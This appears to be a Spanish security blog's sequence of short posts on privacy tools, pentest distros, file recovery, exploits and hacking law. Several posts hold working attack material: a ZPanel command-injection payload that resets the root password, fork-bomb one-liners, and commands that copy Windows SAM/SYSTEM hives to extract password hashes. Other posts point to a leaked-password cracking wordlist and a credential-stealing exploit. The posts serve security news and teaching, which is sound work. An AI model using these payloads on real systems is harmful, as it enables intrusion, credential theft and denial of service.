Cómo llamar por teléfono conservando la privacidad con Redphone

En la foto homenaje al gran Gila.

Considero que soy demasiado insignificante para que merezca la pena perder el tiempo interceptando mis mensajes o capturando una de mis llamadas para realizar una escucha, me siento afortunado en ese aspecto. Sin embargo no todos tienen la misma suerte y tienen que intentar evitar a toda costa que interfieran en su privacidad, en muchos casos de ello depende su libertad e incluso su vida, fijaros en lo serio e importante que es.

Y no hablamos sólo de espías o terroristas a los que acecha la NSA cuyo programa PRISM está tan de moda últimamente, ellos podrían utilizar su propia infraestructura para asegurar sus comunicaciones. Hablamos de gente de a pie que vive bajo el yugo de un régimen opresor y que tiene que apañárselas con los medios disponibles.

Afortunadamente para ellos y para el resto de personas que quieran mantener una lícita privacidad sin concesiones, existen cada vez más herramientas que ayudan a cifrar las comunicaciones impidiendo que cualquier programa gubernamental o tercero en general pueda romperla. Por ejemplo podéis echar un vistazo a la página de PRISM Break donde encontraréis numerosas alternativas libres al software privativo susceptible de colaborar con la NSA en el programa mundial de vigilancia de datos.

Pero en esta entrada vamos a centrarnos exclusivamente en la seguridad de las llamadas de voz a través de nuestros teléfonos con una herramienta de la empresa Whisper Systems: RedPhone.

Ésta aplicación jugó un rol muy importante durante la Primavera Árabe y, aunque hubo cierta controversia por el corte temporal del servicio cuando a finales de 2011 Whisper Systems fue adquirida por Twitter, poco después liberaron su código fuente y hoy en día continúan siendo una muy buena elección.

Eso sí, sólo funciona bajo Android así que lo siento por todos aquellos que tienen iPhone: el iOS de Apple se considera inseguro y además es imposible verificar si una aplicación en iOS fue compilada de su fuente original.

Bugtraq vs Kali Linux

Creo que a estas alturas todos conocemos aunque sea de oídas estas dos distribuciones: muchos comentarios, muchas comparaciones y, como no, alguna que otra burrada nos ha tocado escuchar... 
Harto de comentarios, dimes y diretes, y después de unos meses de letargo, he decidido mojarme objetivamente e intentar orientar a algún que otro despistao... 

A pesar de lo que pueda parecer por el título del artículo no nos disponemos a discernir entre Kali o Bugtraq (pido perdón por el jaque ;D), porque desde nuestro sano juicio, no se nos ocurriría (más a delante expondremos). 

A cambio lo que sí haremos es analizar simultáneamente ambas distribuciones desde el minuto uno... y escupir nuestras modestas y casi profanas impresiones... 

Bueno sin más dilación nos metemos en harina... pero en primer lugar tenemos que decir que Bugtraq al ser "made in Spain" nos llega al corazón y nos deja muy buen sabor de boca, por lo tanto un punto para los chicos de Bugtraq Team!! 

Recuperar fácilmente ficheros borrados en Linux

Eliminar "sin querer" un archivo suele estar a la orden del día y si encima eres como yo que no te gusta ni mirar a la papelera (CAPS+SUP) seguro que en más de una ocasión has tenido que vértelas para recuperar inmediatamente un desafortunado desaguisado...

En Windows lo he hecho miles de veces y de forma fácil y sencilla gracias a mi bien amado Recuva. ¿Pero en Linux? ¿Existen herramientas para ello? La pregunta es evidentemente retórica: existen unas cuantas. Yo en mi caso me quedo con Scalpel basada en Foremost o con Photorec de Testdisk.

Para mi ejemplo y como no quiero ver ni de lejos ningún bisturí (scalpel en inglés) usaré Photorec, una herramienta que diseñada inicialmente para recuperar fotografías borradas o corruptas de las tarjetas de memoria de las cámaras, pero que actualmente puede recuperar cualquier archivo, incluyendo vídeos, documentos, fotografías y más de cien tipos de fichero, además de añadir tus propias firmas si fuera necesario.

El caso es que tengo un mediacenter en el salón con XBMCbuntu y mis incautos dedos mandaron eliminar un capítulo de Juego de Tronos que ansiaba ver en ese momento. Descargarlo de nuevo por tiempo no era una opción y además mi vecino acostumbraba a apagar su router cuando se marchaba de fin de semana (y por ende adiós wi-fi). Había que recuperarlo como fuera...
 

Desoladora imagen de mi pendrive vacío tras el "video-genocidio".

Suerte que ya tenía instalado testdisk (apt-get install testdisk) que incluye Photorec. Así que sólo ejecutarlo y, pasito a pasito, saboreando esas dulces ncurses pude recuperarlo:
 

Bálsamo de curación de mis heridas: tres videos mpg recuperados.

Tocando un poco las narices al oscuro vengador...

Hacer trampas en un videojuego modificando la memoria no es algo nuevo. Los niños de los 80 ya lo conocíamos de forma similar con los POKES de Spectrum y hoy se siguen utilizando estas trampas o cheats en cualquier plataforma. Incluso hay mil y un foros donde se debaten y comparten distintos "trucos".

El caso es que llevo unos días de baja y el teclado que más he podido tocar ha sido el de la pantalla táctil de mi Nexus, así que empecé a jugar a un juego de mazmorras o RPG bastante chulo llamado Dark Avenger. Como podéis imaginar después de tostarme los ojos casi una hora decidí empezar a trastear para ver que se podía hacer con editores de memoria como GameCIH, GameGuardian o HaXplorer. Al ejecutarlo en segundo plano una "agradable" pantalla me advertía:

¡Tenemos un desafío!

ePolicy 0wner (eP0wner) un exploit sexy contra McAfee ePolicy Orchestrator 4.6.5 y anteriores

Todos los administradores de McAfee ePolicy Orchestrator (o sus jefes) deberían ver el siguiente vídeo para darse cuenta (si todavía no lo han hecho) de que tienen que actualizar ¡¡lo antes posible!!

Próximamente se liberará eP0wner, un exploit en Perl que se aprovecha de las siguientes vulnerabilidades en la versión 4.6.5 y anteriores de ePO:

- CVE-2013-0140 – Pre-authenticated SQL injection
- CVE-2013-0141 – Pre-authenticated directory path traversal

y con el cual se facilita:

- la ejecución remota en el servidor de ePO.
- la ejecución remota de las estaciones administradas (un anillo para gobernarlos a todos).
- la subida de archivos en el servidor de ePO.
- el robo de credenciales de Active Directory.

Fuente: Exploit: McAfee ePolicy 0wner (ePowner) – Preview

La GRAN lista de contraseñas para cracking

Defuse Security ha publicado una la enorme lista de palabras que utiliza en su proyecto Crackstation. Esta lista está destinada a su uso con crackers de contraseñas como hashcat, John the Ripper y otras utilidades de recuperación de contraseñas.

Fue originalmente compartida por 'Stun', un hacktivista de Anonymous, contiene 1.493.677.782 palabras y ocupa 4.2 GiB (comprimidos) o 15 GiB (descomprimidos). Esta lista es una mezcla de:

" cada wordlist, diccionario y base de datos de contraseñas filtrada
" cada palabra de la base de datos de Wikipedia (páginas-artículos, a 2010, todos los idiomas)
" así como un montón de libros del Proyecto Gutenberg
" también incluye las contraseñas de algunas bases de datos de contraseñas de bajo perfil que se vendieron en el underground hace unos años

Descarga torrent

Aconsejan eliminar el repositorio obsoleto debian-multimedia.org

En la foto regalo a Sorina Sandu

colaboradora de Debian (instalador).

Hace un tiempo el principal repositorio no oficial de software multimedia para Debian debian-multimedia.org cambió de dominio a deb-multimedia.org. El problema es que recientemente el dominio inicial ha sido adquirido por una entidad desconocida con registro en Ucrania y, aunque las medidas de seguridad propias de la distribución deberían comprobar la firma de paquetes, es recomendable eliminar o modificar este repositorio.

En el fantástico blog de un Bruto con Debian explican claramente como modificarlo:

Si usabas estos repositorios, deberás modificar en tu fichero /etc/apt/sources.list todas las lineas que contenían la antigua direccion y cambiarla por la nueva, quedando tal que así:

    Para Squeeze (estable):
        deb http://www.deb-multimedia.org stable main non-free

    o bien
        deb ftp://ftp.deb-multimedia.org stable main non-free

Bomba fork en Android

Si no habéis oído antes acerca de las bombas fork o de recursión comentaros que son programas que implementan funciones para crear procesos a partir de otros procesos de una manera recursiva e infinita para agotar los recursos de un sistema y causar una denegación de servicio.

Sus formas más simples pueden escribirse con tan sólo unos pocos caracteres, como %0|%0 en Windows o :(){ :|:& };: en Linux que normalmente pueden evitarse limitando el número de procesos de usuario (ulimit), si bien existen otras técnicas de prevención: rexFBD, copy-on-write, etc.

El año pasado se descubrió que los procesos Zygote en Android 4.0.3 e inferiores permiten forks desde otros procesos con cualquier UID, lo que puede permitir a un atacante causar una denegación de servicio a través de una aplicación sin privilegios. La vulnerabilidad CVE-2011-3918 fue supuestamente solucionada por Google permitiendo el acceso al socket de Zygote sólo al usuario system.

Ahora recientemente Antonio Bianchi y Yanick Fratantonio han publicado una prueba de concepto para una bomba fork muy sencilla pero sin embargo más potente capaz de bloquear un dispositivo Android de forma inmediata. Sus autores informaron al equipo de seguridad de Android en febrero que sin embargo descartaron el problema porque puede arreglarse tras el reinicio, pero ¿y se ejecuta por la noche e invalida por ejemplo el proceso de alarma-despertador? o peor, ¿y si se ejecuta siempre al inicio?...

Si quieres probar la aplicación (no necesita privilegios) o ver el código del forkbomb puedes encontrarlos en Github: https://github.com/reyammer/android-forkbomb.

La UE votará por una nueva directiva que endurecerá las penas contra el hacking ilegal

La Unión Europea ha desarrollado un borrador que incluye penas más severas para los culpables de hacking y que será sometido a votación el próximo mes de julio en la Comisión del Parlamento Europeo de Libertades Civiles, Justicia y Asuntos de Interior.

De aprobarse la nueva directiva, las personas declaradas culpables de los siguientes tipos de piratería ilegal se enfrentarán al menos a dos años de prisión, siempre que lo hagan con intención criminal y causen daños graves, o si no cuentan todo acerca de la vulnerabilidad correspondiente en el momento oportuno:
- Acceso intencionado e ilegal a un sistema de información.
- Interferir datos ilegalmente.
- Interceptar ilegalmente las comunicaciones. Esto incluye las grabación de comunicaciones y cubre el tiempo que abarca la transferencia de datos desde el emisor hasta el receptor, por cable o inalámbrica, y los dispositivos y tecnologías de registro, incluyendo software, contraseñas y códigos.
- Producción y venta intencionada de herramientas utilizadas para cometer esos delitos.

La propuesta aboga también por un mínimo de cinco años de prisión por aquellos que cometan ataques contra infraestructura críticas y también se aplica en caso de que el ataque se haya llevado a cabo por una organización delictiva o si causa daños graves. Lo creadores y administradores de botnets tampoco se salvan y se enfrentarán al menos tres años de prisión (cuidado amigos de Flu ;) ).

La nueva directiva también estipula que los Estados miembros de la UE deben responder en un máximo de 8 horas a las peticiones urgentes de seguridad de otros Estados miembros que experimentan ataques cibernéticos e incluye otras sanciones como a aquellas empresas que contraten hackers para afectar a la competencia por lo que podrían perder sus beneficios públicos o incluso cerrar.

La buena noticia es que la directiva es clara en la distinción de los ataques que no tienen intención de delinquir, lo que cubriría las pruebas o la protección de los sistemas de información y por lo tanto protege a los denunciantes. Eso es tranquilizador ya que las pruebas de intrusión y denuncias son actividades esenciales que merecen protección legal.

Fuente: EU to vote on harsher penalties for hackers

5 alternativas a Google para que no te sigan la pista en Internet

Algunas personas sienten la presión de ser observadas mientras utilizan Google para sus búsquedas en Internet. Inevitablemente los usuarios están sujetos a la minería de datos masiva de Google que se realiza a través de todas sus redes como YouTube, Gmail y por supuesto su motor de búsqueda. La mayoría de la gente ni siquiera se molesta en utilizar cualquier otro motor de búsqueda y, paradójicamente, la mayoría probablemente utiliza Google para encontrar alternativas. 

Los siguientes son otros motores de búsqueda muy útiles que no te seguirán la pista a través de Internet:

- DuckDuckGo: Un gran motor de búsqueda global que tiene algunos atajos muy ingeniosos para hacer búsquedas rápidas y eficientes.
- Wolfram Alpha: Wolfram Alpha muestra información en base a las solicitudes en lugar de una lista de enlaces, pueden obtenerse pueden respuestas inmediatas a cosas como ecuaciones matemáticas y conversiones.
- StartPage: esencialmente busca en Google por nosotros, evitando que nos afecte el seguimiento.
- Blekko: Blekko se concentra en ofrecer contenidos de alta calidad y libres de spam.
- Dogpile: Dogpile busca simultáneamente en los 3 principales motores de búsqueda, Google, Yahoo y Bing y transmite los resultados de vuelta.

Fuente: Top 5 Alternative Search Engines That Aren’t Google

Desmontando a patowc

El pasado 22 de mayo Román Ramírez (aka @patowc) dió una charla llamada "Mundo hacking" en la Universidad Politécnica de Madrid en la que nos hablaba de este mundo a través de sus ojos. Un auto-repaso a nada más y nada menos que 20 años de experiencias de uno de los hackers más ilustres del panorama nacional, un hacker que no titubea en afirmar que es un hacker. Un vídeo que nos os podéis perder con un montón de "perlas", anécdotas y reflexiones.

"Ser hacker no es conocimiento, es una forma de ser: el conocimiento se adquiere".

En la sección Conferencias TASSI del servidor web de Criptored encontrarás la presentación en pdf y el material sonoro utilizado por el ponente, así como todas las conferencias de este noveno y anteriores ciclos UPM TASSI.

http://www.criptored.upm.es/paginas/docencia.htm#TASSI2013

Acceso a todas las conferencias de 2013 desde el Canal YouTube UPM (más de 10.000 reproducciones en sólo 3 meses)

http://www.youtube.com/user/UPM/search?query=TASSI+2013

Fuente: Hispasec

Lock Picking a lo MacGyver (aka abriendo candados pequeños)

En muchas películas y series de televisión se suelen abrir candados y cerraduras con una sola herramienta: MacGyver con UN sólo clip y otros menos hábiles con un sólo lockpick (tomado generalmente al azar uno del estuche). A los que tienen nociones del tema esto puede sorprenderlos ligeramente, pues lo normal (en cerraduras de "pines o dientes", las más comunes del mercado) es utilizar dos herramientas, un tensor para hacer girar el mecanismo y un lockpick para manipular la cerradura.

Hay un grupo de cerraduras que son "susceptibles" a cumplir el cliché de la televisión y abrirse con un solo pick: las de los candados pequeños, como los que se usan por "seguridad" en las maletas. 

Para un viaje tuve que comprar candados para mis maletas, iba a comprar candados de combinación pero el vendedor me recomendó un modelo más seguro, como el que se muestra en la imagen:

Vulnerabilidad crítica en Zpanel 10.0.0.2 permite la ejecución remota de código

Si hace poco "Kingcope" publicaba exploits para versiones antiguas de Plesk, ahora le toca el turno a ZPanel, otro de los paneles para hosting web más usados en la actualidad. 
Concretamente se trata de una vulnerabilidad en el módulo "Protect Directory" de la versión 10.0.0.2 que puede permitir la ejecución remota de comandos en la shell de la máquina debido al inexistente revisión/escape de los datos entrada. Sería por ejemplo posible el cambio de contraseña de root y el acceso completo al servidor. 

Los pasos para explotarlo serían los siguientes:

1. Accede como cualquier usuario y vista http:///?module=htpasswd&selected=Selected&path=/

1a. En el campo "Username" introduce (incluyendo el punto y coma inicial y la almohadilla del final):

;/etc/zpanel/panel/bin/zsudo "echo 'newpassword'" "| passwd --stdin root" #

De-ICE: distribuciones "objetivo" para entrenar pentesters

De-ICE es esencialmente un conjunto de live-cds que te proveerán de entornos "objetivos" o víctimas lo más reales posibles para ensayar y entrenar todas tus habilidades de pentester.
 
Detrás está nada más y nada menos que Thomas Wilhelm (alias “The Hacker Junkie”) autor de grandes libros de Syngress como Ninja Hacking o Proffesional Penetration Testing y de varios artículos en la revista Hackin9. 
Además estos live-cds suelen utilizarse y están orientados a formaciones de Hacking Dojo para facilitar a los estudiantes tutoriales paso-a-paso de cómo utilizar varias herramientas de pentesting contra un entorno de laboratorio.
 
La última versión que probé, la 1.30 basada Slax Linux, presentaba retos intesantes. Ahora se acaba de lanzar la versión 1.40 con un nuevo "servidor-desafío" configurado con una IP estática 192.168.1.140. De momento sólo está disponible para los estudiantes de Hacking Dojo pero será lanzada al público en general el próximo 11 de junio.

• De-ICE S1.100
• De-ICE S1.110
• De-ICE S1.120
• De-ICE S1.123 también conocido como Hackerdemia LiveCD
• De-ICE S1.130
• De-ICE S1.140

De cómo saltar a la VLAN de voz con Windows y dos "pedrás"

En telefonía IP normalmente se tiende a separar las redes de voz (teléfonos IPs y resto de componentes de la plataforma) de las de datos (PCs, servidores, impresoras, etc.).

El puesto de usuario más característico en estos entornos es un puesto de trabajo conectado a un teléfono IP, y a su vez ese teléfono IP conectado a un único punto de red/switch. De esta manera se usa un único interfaz de un switch por puesto (teléfono + PC) y se ahorra en cableado estructurado.

Ésto es posible porque un puerto de acceso puede manejar dos VLANs: la VLAN de acceso (datos) y la VLAN de voz (auxiliar). Además los switches pueden proporcionar alimentación a los teléfonos vía ethernet (power inline, PoE), priorizar el tráfico de voz con marcado de CoS y, en definitiva, separar lógicamente ambos mundos. 

Un ejemplo de configuración de un puerto específico en un modelo Catalyst sería el siguiente:

interface GigabitEthernet1/0/5
 switchport access vlan 30
 switchport mode access
 switchport voice vlan 21
 authentication control-direction in
 authentication event fail retry 3 action authorize vlan 40
 authentication event server dead action authorize
 authentication event no-response action authorize vlan 40
 authentication event server alive action reinitialize
 authentication host-mode multi-host
 authentication order dot1x mab
 authentication port-control auto
 authentication violation protect
 mab
 dot1x pae authenticator
 dot1x timeout tx-period 10
 dot1x timeout supp-timeout 10
 dot1x max-req 1
 dot1x max-reauth-req 1
 spanning-tree portfast
 spanning-tree bpduguard enable
 spanning-tree guard root

Con esta configuración cuando un PC se conecte a la red a través del teléfono accederá a la VLAN de datos principal (30) o de invitados (40) dependiendo del resultado de la autenticación 802.1x.

Si por el contrario es un teléfono IP de Cisco el que se conecta a la red, el terminal enviará un paquete CDP (Cisco Discovery Protocol) a la dirección multicast 01:00:0c:cc:cc:cc (0x0802) para unirse a la VLAN de voz, incluso sin necesidad de autenticación 802.1x ya que Cisco autoriza directamente al teléfono si no dispone de suplicante }:-)

Ahora bien, existen numerosas razones por las que alguien puede querer llegar a ganar acceso no autorizado desde su PC a la VLAN de voz, y seguramente ninguna de ellas buena...

Extracción local de hashes de la SAM y SYSTEM en Windows

De sobra ya sabéis que la SAM y SYSTEM contienen la información necesaria para adquirir los hashes de autenticación de todos los usuarios locales en un sistema operativo Windows. Y seguro que también sabéis que estos archivos están bloqueados y son de difícil acceso, incluso para las cuentas de administrador del sistema.

Las siguientes técnicas que repasan en LaNMaSteR53 son formas de acceder a la SAM y SYSTEM de un SO Windows en funcionamiento. Ten en cuenta que estas técnicas requieren privilegios de administrador o del sistema.
 

Servicio Volume Shadow Copy

vssadmin create shadow /for=c: (if required)
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<#_from_above>\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<#_from_above>\windows\system32\config\SAM .
Referencia

Acceso al registro

reg save hklm\sam SAM
reg save hklm\system SYSTEM
Referencia
 

Script en PowerShell

$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
`cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM"\`
$volume.Delete();if($notrunning -eq 1){$service.Stop()}
Referencia
 

Finishing the Job

Los siguientes comandos se incluyen en la distro Kali:
bkhive SYSTEM keyfile
samdump2 SAM keyfile
 

Otros?

¡Comenta!

Lahana: VPN->Tor sobre Amazon EC2

Si seguís las noticias sabréis que en los últimos días se han incrementado las protestas y manifestaciones de los turcos contra el gobierno de Erdogan, retroalimentados por sus respuestas violentas y desmesuradas que intenta ocultar por medio de la censura de los medios sociales.
Lahana es la herramienta que ha publicado Steve Lord para ayudar a todos aquellos que quieran evitar el control en Internet y no es más (ni menos) que un script auto-instalable que crea un bridge VPN-Tor mediante un hosting gratuito en Amazon EC2.

El servicio EC2 (Elastic Compute Cloud) de Amazon permite crear instancias de servidores dedicados con una carga muy pequeña para aprender a manejar el servicio sin coste. Todo lo que necesitas para usar Lahana es crearte una cuenta gratuita en este servicio, subir el script y ejecutarlo. En 5 minutos dispondrás de una VPN IPSEC PSK que enviará todo el tráfico saliente tunelizado a través de Tor. Después sólo quedará configurar el cliente y listo!

Si tienes ya cuenta, quieres compartir información, dudas, colaborar traduciendo documentación o hacer otras guías para Windows XP/7 o Android (el manual de iOS puedes encontrarlo aquí) accede a:

* https://news.ycombinator.com/item?id=5810091
* http://www.reddit.com/r/netsec/comments/1fjfbb/lahana_a_vpn_to_torinternet_bridge_autobuild/

Si quieres probarlo sin instalar tu propio nodo:

Username: bob
Password: bob
Secret: whoop
Hostname: ec2-50-19-10-247.compute-1.amazonaws.com

Más detalles y web del proyecto en: http://lahana.dreamcats.org/.